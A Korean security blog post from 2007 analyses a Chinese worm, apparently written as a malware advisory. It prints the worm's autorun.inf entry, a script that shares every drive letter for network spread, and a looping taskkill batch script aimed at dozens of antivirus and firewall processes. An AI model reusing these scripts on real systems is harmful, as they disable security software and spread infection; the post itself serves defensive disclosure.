태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

신종악성코드정보2007. 12. 11. 11:11


중국에서 제작된 이 웜은 몇 가지 위장 속임수를 사용하면서 자신을 보호한다.

아래의 경로에 아래와 같은 파일들을 설치한다.

%systemroot%\system32\SDGames.exe
%systemroot%\system32\Taskeep.vbs
%systemroot%\system32\Avpser.cmd
%systemroot%\system32\netshare.cmd
%systemroot%\system32\AUTORUN.INF

Autorun.inf 파일을 이용해서 자동실행 기법을 이용한다.

[Autorun]
OPEN=SDGames.exe
Shell\Open=打?(^&O)
Shell\Open\Command=SDGames.exe
Shell\Explore=?源管理器(^&X)
Shell\Explore\Command=SDGames.exe

사용자 삽입 이미지


휴지통(Recycleds.url)과 윈도우 폴더(Windows.url)로 위장한 웹 문서 바로가기를 만들어 악성코드인 SDGames.exe 가 실행되도록 만든다.

물론 위의 화면에서는 숨김속성 파일을 모두 보이게 조치했지만 실제로는 숨김속성 파일과 폴더는 모두 보여지지 않는다. (폴더 옵션 메뉴를 제거하기 때문에 일반 사용자는 속성변경 자체가 어렵다.)

사용자 삽입 이미지

사용자 삽입 이미지

netshare.cmd 를 이용해서 모든 드라이브 공유(쓰기권한)를 시도하고 네트워크 확산에 사용한다.

net share A=A:
net share B=B:
net share C=C:
net share D=D:
net share E=E:
net share F=F:
net share G=G:
net share H=H:
net share I=I:
net share J=J:
net share K=K:
net share L=L:
net share M=M:
net share N=N:
net share O=O:
net share P=P:
net share Q=Q:
net share R=R:
net share S=S:
net share T=T:
net share U=U:
net share V=V:
net share W=W:
net share X=X:
net share Y=Y:
net share Z=Z:

사용자 삽입 이미지

Avpser.cmd 는 taskkill 명령어를 이용해서 다양한 보안프로그램의 프로세스 종료를 시도한다.

사용자 삽입 이미지

@echo off
:k
Set p=taskkill /f /im /t
sc config winmgmt start= AUTO & net start winmgmt
%p% RavMonD.exe
%p% RavStub.exe
%p% Anti*
%p% AgentSvr*
%p% CCenter*
%p% Rsaupd*
%p% SmartUp*
%p% FileDsty*
%p% RegClean*
%p% 360tray*
%p% 360safe*
%p% kabaload*
%p% safelive*
%p% KASTask*
%p% kpFW32*
%p% kpFW32X*
%p% KvXP_1*
%p% KVMonXP_1*
%p% KvReport*
%p% KvXP*
%p% KVMonXP*
%p% nter*
%p% TrojDie*
%p% avp.com
%p% KRepair.COM
%p% Trojan*
%p% KvNative*
%p% Virus*
%p% Filewall*
%p% Kaspersky*
%p% JiangMin*
%p% RavMonD*
%p% RavStub*
%p% RavTask*
%p% adam*
%p% cSet*
%p% PFWliveUpdate*
%p% mmqczj*
%p% Trojanwall*
%p% Ras.exe
%p% runiep.exe
%p% avp.exe
%p% PFW.exe
%p% rising*
%p% ikaka*
%p% .duba*
%p% kingsoft*
%p% 木?*
%p% 社?*
%p% aswBoot*
%p% MainCon*
%p% Regs*
%p% AVP*
%p% Task*
%p% regedit*
%p% Ras*
%p% srgui*
%p% norton*
%p% avp*
%p% fire*
%p% spy*
%p% bullguard*
%p% PersFw*
%p% KAV*
%p% ZONEALARM*
%p% SAFEWEB*
%p% OUTPOST*
%p% ESAFE*
%p% clear*
%p% BLACKICE*
%p% 360safe.exe
%p% Shadowservice.exe
%p% v3webnt.exe
%p% v3sd32.exe
%p% v3monsvc.exe
%p% sysmonnt.exe
%p% hkcmd.exe
%p% DNTUS26.EXE
%p% AhnSD.exe
%p% CTFMON.EXE
%p% MonsysNT.exe
%p% awrem32.exe
%p% WINAW32.EXE
%p% PNTIOMON.exe
%p% avgw.exe
%p% avgcc32.exe
%p% PROmon.exe
%p% PNTIOMON.exe
%p% MagicSet.exe
%p% MainCon.exe
%p% TrCleaner.exe
%p% WmNetPro.exe
%p% 修?*
%p% 保?*
goto k
Posted by viruslab

댓글을 달아 주세요